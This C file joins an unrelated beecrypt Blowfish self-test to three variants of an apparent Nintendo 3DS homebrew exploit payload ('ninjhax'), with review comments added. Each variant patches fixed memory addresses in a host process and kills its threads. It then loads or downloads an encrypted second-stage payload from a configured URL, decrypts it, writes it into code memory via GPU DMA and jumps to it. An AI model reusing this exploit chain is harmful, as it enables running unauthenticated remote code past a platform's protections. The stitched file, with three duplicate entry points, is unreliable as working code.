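/*
 * Round-trip self-test for beecrypt's Blowfish in ECB mode.
 *
 * Every whole 8-byte block of the global `buffer` is encrypted in place
 * under the 128-bit key `enckey`, then decrypted in place with a second,
 * independently scheduled context.  After a successful run `buffer` holds
 * its original contents again.
 *
 * Globals read: enckey, buffer, bufferlen (defined elsewhere in the file).
 * Side effects: `buffer` is rewritten in place; nothing is returned.
 *
 * Only whole blocks are touched: a trailing partial block (bufferlen not a
 * multiple of 8) is left alone instead of being read and written past the
 * end of `buffer`, which the previous `p < bufferlen` bound allowed.
 * A nonzero return from blowfishSetup is treated as failure and the
 * function returns without touching `buffer`, so data is never pushed
 * through an unscheduled context.
 *
 * NOTE(review): `buffer + off` is cast to uint32_t* in place, which
 * assumes `buffer` is 4-byte aligned — confirm at its definition.
 * ECB exposes block-level patterns; it is acceptable here only because
 * this is a primitive self-test, not a data-protection path.
 */
void test_beecrypt_blowfish_ecb(void) {
    enum { BLOCK = 8 }; /* Blowfish block size in bytes */

    blowfishParam encctx;
    if (blowfishSetup(&encctx, (byte*)enckey, 128, ENCRYPT) != 0)
        return;
    /* off + BLOCK <= bufferlen keeps the last block fully inside buffer */
    for (unsigned int off = 0; off + BLOCK <= bufferlen; off += BLOCK)
        blowfishEncrypt(&encctx, (uint32_t*)(buffer + off), (uint32_t*)(buffer + off));

    blowfishParam decctx;
    if (blowfishSetup(&decctx, (byte*)enckey, 128, DECRYPT) != 0)
        return;
    for (unsigned int off = 0; off + BLOCK <= bufferlen; off += BLOCK)
        blowfishDecrypt(&decctx, (uint32_t*)(buffer + off), (uint32_t*)(buffer + off));
}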
/*
 * Payload entry point, file-loading variant.
 *
 * Sequence: blank the screen, stop the DSP component, patch a handful of
 * fixed addresses in the host process so its other threads stop, read
 * "/edit/payload.bin" through the FS service into a fixed buffer, decrypt
 * it in place with the process's own Blowfish routines, copy the result
 * into code memory with doGspwn(), and jump to it.
 *
 * Every numeric address below is an offset into one specific build of the
 * host process; on any other build the same writes land on unrelated
 * memory.  Errors are not recoverable: each checked step writes a marker
 * value (0xC0DF000n) to address 0 on failure, i.e. a deliberate crash that
 * identifies the failing step by the value stored.
 *
 * NOTE(review): the file is decrypted but, as far as this block shows,
 * never authenticated before it is executed — decryption is not an
 * integrity check.  Whatever can place that file controls what runs.
 * NOTE(review): `_main` begins with an underscore at file scope, which C
 * reserves for the implementation.
 */
int _main() {
    // Service handle and cache-flush routine live at fixed addresses
    // (CN_* constants are defined elsewhere in the project).
    Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
    Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
    paintScreen(0x00,0x00,0x00); // presumably fills the screen with RGB(0,0,0)
    // drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0);
    // drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0);
    Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR; // NOTE(review): unused in this variant
    int line=10; // NOTE(review): unused (only the commented-out debug output needs it)
    Result ret; // assigned once below (FlushDataCache) and never checked
    // Kernel object handles and routine entry points at fixed addresses
    // inside the host process image.
    Handle* addressArbiterHandle=(Handle*)0x003414B0;
    Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
    Handle** dspHandle=(Handle**)0x341A4C;
    _DSP_UnloadComponent(*dspHandle); // return value ignored
    //close threads
    //patch gsp event handler addr to kill gsp thread ASAP
    // Overwrites one slot of a handler table in process memory; the
    // original comment says the new value is the svc 0x9 stub.
    *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
    //patch waitSyncN
    // patchMem(handle, address, length, ?, ?): the meaning of the last two
    // arguments is not visible in this file — see patchMem's definition.
    patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
    patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
    patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
    // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
    // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
    //patch arbitrateAddress
    patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
    //wake threads
    // None of the three wake-up calls has its result checked.
    svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
    svc_signalEvent(((Handle*)0x354ba8)[2]);
    s32 out; // output of svc_releaseSemaphore, never read
    svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1);
    //CHECK !
    //kill thread5 without panicking the kernel...
    // Clears one byte at a fixed address; the comment above is the only
    // description of what that byte controls.
    *(u8*)(0x3664D8+0xd)=0x00;
    //load secondary payload
    u32 secondaryPayloadSize; // set by _FSFILE_Read below, used as the decrypt length
    {
        Result ret; // NOTE(review): shadows the outer `ret`
        Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
        // Archive id 4 with an empty path; the variable name suggests the
        // save-data archive — confirm against the FS service documentation.
        FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
        //read secondary payload file
        Handle fileHandle;
        ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
        if(ret)*(u32*)NULL=0xC0DF0002; // deliberate crash with a step marker
        // Reads up to 0x11000 bytes from offset 0 into the fixed buffer at
        // 0x14100000; judging by its later use, secondaryPayloadSize
        // receives the byte count actually read.
        ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000);
        if(ret)*(u32*)NULL=0xC0DF0003;
        ret=_FSFILE_Close(fileHandle);
        if(ret)*(u32*)NULL=0xC0DF0004;
    }
    //decrypt it
    {
        // The host process's own Blowfish key schedule and decrypt
        // routines, called by address.  The schedule is built into the
        // scratch area at 0x14200000 and the file is decrypted in place.
        Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
        Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
        blowfishKeyScheduler((u32*)0x14200000);
        // NOTE(review): secondaryPayloadSize is passed as-is; presumably it
        // must be a multiple of the 8-byte block size, which is not checked.
        blowfishDecrypt((u32*)0x14200000, (u32*)0x14100000, (u32*)0x14100000, secondaryPayloadSize);
    }
    // Flush 0x300000 bytes so the subsequent GPU-side copy sees the
    // decrypted data (0xFFFF8001 is conventionally the current-process
    // pseudo-handle — confirm).  Result stored but not checked.
    ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
    // Copy 0xA000 bytes of the decrypted buffer into code memory below
    // CN_3DSX_LOADADR; by its name doGspwn() performs the write via GSP.
    doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
    svc_sleepThread(0x3B9ACA00); // 0x3B9ACA00 = 1e9; one second if the unit is ns
    // Jump into the copied payload.  This variant passes 0 as the size
    // argument, unlike the network variants, which pass the payload size.
    void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
    reset(0);
    while(1); // spin if reset() ever returns
    return 0; // unreachable
}
/*
 * Payload entry point, network variant with failure markers.
 *
 * Sequence: blank the top screen, stop the DSP component, patch a handful
 * of fixed addresses in the host process so its other threads stop,
 * download CN_NINJHAX_URL + "<firm>_<cn>_<spider>_<ro>.bin" through the
 * http:C service into a fixed buffer, decrypt it with the process's own
 * Blowfish routines into a second buffer, copy that into code memory with
 * doGspwn(), and jump to it.
 *
 * Every numeric address below is an offset into one specific build of the
 * host process; on any other build the same writes land on unrelated
 * memory.  Errors are not recoverable: each checked step writes a marker
 * value (0xC0DE000n) to address 0 on failure, a deliberate crash that
 * identifies the failing step by the value stored.
 *
 * NOTE(review): the response body is decrypted but, as far as this block
 * shows, never authenticated before it is executed.  The device therefore
 * runs whatever the configured URL host — or anything able to alter the
 * response in transit, including the default proxy selected below —
 * returns.  Decryption is not an integrity check.
 * NOTE(review): `_main` begins with an underscore at file scope, which C
 * reserves for the implementation.
 */
int _main() {
    // Service handle and cache-flush routine live at fixed addresses
    // (CN_* constants are defined elsewhere in the project).
    Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
    Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
    // Blank the top screen: 0x46500 = 400*240*3 bytes, one 24-bit
    // framebuffer; the *2 presumably covers a second, contiguous buffer.
    for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
    // drawString(TOPFBADR1,"ninjhaxx",0,0);
    // drawString(TOPFBADR2,"ninjhaxx",0,0);
    Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
    int line=10; // NOTE(review): only the commented-out drawHex() calls use it
    Result ret;
    // Kernel object handles and routine entry points at fixed addresses
    // inside the host process image.
    Handle* addressArbiterHandle=(Handle*)0x334960;
    Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
    Handle** dspHandle=(Handle**)0x334EFC;
    _DSP_UnloadComponent(*dspHandle); // return value ignored
    //close threads
    //patch gsp event handler addr to kill gsp thread ASAP
    // Overwrites one slot of a handler table in process memory; the
    // original comment says the new value is the svc 0x9 stub.
    *((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
    //patch waitSyncN
    // patchMem(handle, address, length, ?, ?): the meaning of the last two
    // arguments is not visible in this file — see patchMem's definition.
    patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
    patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
    patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
    // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
    //patch arbitrateAddress
    patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
    //wake threads
    // None of the three wake-up calls has its result checked.
    svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
    svc_signalEvent(((Handle*)0x3480d0)[2]);
    s32 out; // output of svc_releaseSemaphore, never read
    svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
    //kill thread5 without panicking the kernel...
    // Clears one byte at a fixed address; the comment above is the only
    // description of what that byte controls.
    *(u8*)0x359935=0x00;
    svc_sleepThread(0x10000000); // ~0.27 s if the unit is ns; gives the patched threads time to settle
    // First http:C session: create the request context.  This ret is not
    // checked; the second session below is.
    Handle httpcHandle;
    ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
    // drawHex(ret,0,line+=10);
    // drawHex(httpcHandle,0,line+=10);
    Handle httpContextHandle=0x00;
    ret=HTTPC_Initialize(httpcHandle);
    // drawHex(ret,0,line+=10);
    // The URL is assembled at compile time from string-literal macros, so
    // the file name encodes the firmware / version combination this build
    // targets.
    ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL FIRM_VERSION "_" CN_VERSION "_" SPIDER_VERSION "_" RO_VERSION ".bin", &httpContextHandle);
    // drawHex(ret,0,line+=10);
    // Second http:C session performs the actual transfer; each step crashes
    // with a distinct marker on failure.
    Handle httpcHandle2;
    ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
    if(ret)*(u32*)NULL=0xC0DE0001;
    ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
    if(ret)*(u32*)NULL=0xC0DE0002;
    ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle); // system default proxy, if any, is trusted
    if(ret)*(u32*)NULL=0xC0DE0003;
    // drawHex(ret,0,line+=10);
    ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
    if(ret)*(u32*)NULL=0xC0DE0004;
    // drawHex(ret,0,line+=10);
    // Fixed scratch buffers: buffer0 receives the download, buffer1 the
    // decrypted copy.  The 0x300000 limit below bounds the receive.
    u8* buffer0=(u8*)0x14300000;
    u8* buffer1=(u8*)0x14100000;
    u32 secondaryPayloadSize=0x0;
    ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
    if(ret)*(u32*)NULL=0xC0DE0005;
    ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
    if(ret)*(u32*)NULL=0xC0DE0006;
    // drawHex(ret,0,line+=10);
    // NOTE(review): ret is not assigned from HTTPC_CloseContext, so the
    // 0xC0DE0007 check below re-tests the previous call's result and can
    // never fire on a close failure.
    HTTPC_CloseContext(httpcHandle2, httpContextHandle);
    if(ret)*(u32*)NULL=0xC0DE0007;
    //TODO : modify key/parray first ?
    //(use some of its slots as variables in ROP to confuse people ?)
    //decrypt secondary payload
    // The host process's own Blowfish key schedule and decrypt routines,
    // called by address.  The schedule is built in the scratch area at
    // 0x14200000; buffer0 is decrypted into buffer1.
    Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A44BC;
    Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A4B04;
    blowfishKeyScheduler((u32*)0x14200000);
    // NOTE(review): secondaryPayloadSize is the downloaded length as-is;
    // presumably it must be a multiple of the 8-byte block size — not checked.
    blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
    // Flush 0x300000 bytes so the GPU-side copy sees the decrypted data
    // (0xFFFF8001 is conventionally the current-process pseudo-handle —
    // confirm).  Result stored but not checked.
    ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer1, 0x300000);
    // drawHex(ret,0,line+=10);
    // Copy 0xA000 bytes of the decrypted buffer into code memory below
    // CN_3DSX_LOADADR; by its name doGspwn() performs the write via GSP.
    doGspwn((u32*)(buffer1), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
    svc_sleepThread(0x3B9ACA00); // 0x3B9ACA00 = 1e9; one second if the unit is ns
    // drawString(TOPFBADR1,"ninjhax2",100,0);
    // drawString(TOPFBADR2,"ninjhax2",100,0);
    // //close thread handles
    // ret=svc_closeHandle(*((Handle*)0x359938));
    // ret=svc_closeHandle(*((Handle*)0x34FEA4));
    // ret=svc_closeHandle(*((Handle*)0x356274));
    // ret=svc_closeHandle(*((Handle*)0x334730));
    // ret=svc_closeHandle(*((Handle*)0x334F64));
    // Jump into the copied payload, passing the downloaded size.
    void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
    reset(secondaryPayloadSize);
    return 0; // only reached if reset() returns
}
/*
 * Payload entry point, network variant with LZSS-compressed payload.
 *
 * Sequence: blank the top screen, stop the DSP component and unregister
 * its interrupt events, patch a handful of fixed addresses in the host
 * process so its other threads stop, download CN_NINJHAX_URL + OUTNAME
 * ".bin" through the http:C service, decrypt it with the process's own
 * Blowfish routines, strip trailing zero words, LZSS-decompress it back
 * over the download buffer, copy that into code memory with doGspwn(),
 * and jump to it.
 *
 * Every numeric address below is an offset into one specific build of the
 * host process; on any other build the same writes land on unrelated
 * memory.  Unlike the marker-checked variant, this one ignores every
 * service result: a failed download or decrypt proceeds into the decrypt
 * and copy steps with whatever the buffers happen to contain.
 *
 * NOTE(review): the response body is decrypted and decompressed but, as
 * far as this block shows, never authenticated before it is executed, and
 * the decompressed size is taken from the data itself without being
 * bounded against the destination buffer.  Decryption is not an integrity
 * check; the URL host and any default proxy are fully trusted.
 * NOTE(review): `_main` begins with an underscore at file scope, which C
 * reserves for the implementation.
 */
int _main() {
    // Service handle and cache-flush routine live at fixed addresses
    // (CN_* constants are defined elsewhere in the project).
    Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
    Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
    // Blank the top screen: 0x46500 = 400*240*3 bytes, one 24-bit
    // framebuffer; the *2 presumably covers a second, contiguous buffer.
    for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
    // drawString(TOPFBADR1,"ninjhaxx",0,0);
    // drawString(TOPFBADR2,"ninjhaxx",0,0);
    Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
    int line=10; // NOTE(review): only the commented-out drawHex() calls use it
    Result ret; // assigned throughout but never checked in this variant
    // Kernel object handles and routine entry points at fixed addresses
    // inside the host process image.
    Handle* addressArbiterHandle=(Handle*)0x003414B0;
    Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
    Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
    Handle** dspHandle=(Handle**)0x341A4C;
    _DSP_UnloadComponent(*dspHandle); // return value ignored
    // Called with event handle 0 — presumably detaches the DSP interrupt
    // event; confirm against the DSP service documentation.
    _DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
    //close threads
    //patch gsp event handler addr to kill gsp thread ASAP
    // Overwrites one slot of a handler table in process memory; the
    // original comment says the new value is the svc 0x9 stub.
    *((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
    //patch waitSyncN
    // patchMem(handle, address, length, ?, ?): the meaning of the last two
    // arguments is not visible in this file — see patchMem's definition.
    patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
    patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
    patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
    // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
    // patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
    //patch arbitrateAddress
    patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
    //wake threads
    // None of the three wake-up calls has its result checked.
    svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
    svc_signalEvent(((Handle*)0x354ba8)[2]);
    s32 out; // output of svc_releaseSemaphore, never read
    svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1);
    //CHECK !
    //kill thread5 without panicking the kernel...
    // Clears one byte at a fixed address; the comment above is the only
    // description of what that byte controls.
    *(u8*)(0x3664D8+0xd)=0x00;
    svc_sleepThread(0x10000000); // ~0.27 s if the unit is ns; gives the patched threads time to settle
    // First http:C session: create the request context.
    Handle httpcHandle;
    ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
    // drawHex(ret,0,line+=10);
    // drawHex(httpcHandle,0,line+=10);
    Handle httpContextHandle=0x00;
    ret=HTTPC_Initialize(httpcHandle);
    // drawHex(ret,0,line+=10);
    // URL assembled at compile time from string-literal macros.
    ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL OUTNAME ".bin", &httpContextHandle);
    // drawHex(ret,0,line+=10);
    // Second http:C session performs the actual transfer.  NOTE(review):
    // none of these results is checked, so a failed request still falls
    // through to the decrypt and copy steps below.
    Handle httpcHandle2;
    ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
    ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
    ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle); // system default proxy, if any, is trusted
    // drawHex(ret,0,line+=10);
    ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
    // drawHex(ret,0,line+=10);
    // Fixed scratch buffers: buffer0 receives the download and later the
    // decompressed output; buffer1 holds the decrypted (still compressed)
    // copy.  The 0x300000 limit below bounds only the receive.
    u8* buffer0=(u8*)0x14100000;
    u8* buffer1=(u8*)0x14300000;
    u32 secondaryPayloadSize=0x0;
    ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
    ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
    // drawHex(ret,0,line+=10);
    HTTPC_CloseContext(httpcHandle2, httpContextHandle);
    //TODO : modify key/parray first ?
    //(use some of its slots as variables in ROP to confuse people ?)
    //decrypt secondary payload
    // The host process's own Blowfish key schedule and decrypt routines,
    // called by address.  The schedule is built in the scratch area at
    // 0x14200000; buffer0 is decrypted into buffer1.
    Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
    Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
    blowfishKeyScheduler((u32*)0x14200000);
    // NOTE(review): secondaryPayloadSize is the downloaded length as-is;
    // presumably it must be a multiple of the 8-byte block size — not checked.
    blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
    // Strip trailing zero words from the decrypted data (presumably block
    // padding).  NOTE(review): there is no lower bound — if the buffer is
    // all zero words, or the size is below 4 or not a multiple of 4, this
    // walks below buffer1.  A `secondaryPayloadSize >= 4` guard in the
    // condition would stop it at the buffer start.
    while(!*(u32*)(&buffer1[secondaryPayloadSize-4]))secondaryPayloadSize-=4;
    // Decompress back into buffer0.  The output size comes from the
    // downloaded data itself and is not compared against the space
    // available at buffer0 before the write.
    lzss_decompress(buffer1, secondaryPayloadSize, buffer0, lzss_get_decompressed_size(buffer1, secondaryPayloadSize));
    // Flush 0x300000 bytes so the GPU-side copy sees the decompressed data
    // (0xFFFF8001 is conventionally the current-process pseudo-handle —
    // confirm).  Result stored but not checked.
    ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer0, 0x300000);
    // drawHex(ret,0,line+=10);
    // Copy 0xC000 bytes of the decompressed buffer into code memory below
    // CN_3DSX_LOADADR; by its name doGspwn() performs the write via GSP.
    doGspwn((u32*)(buffer0), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
    svc_sleepThread(0x3B9ACA00); // 0x3B9ACA00 = 1e9; one second if the unit is ns
    // drawString(TOPFBADR1,"ninjhax2",100,0);
    // drawString(TOPFBADR2,"ninjhax2",100,0);
    // Jump into the copied payload.  NOTE(review): the size passed is the
    // trimmed compressed length, not the decompressed one — confirm that
    // is what the payload expects.
    void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
    reset(secondaryPayloadSize);
    return 0; // only reached if reset() returns
}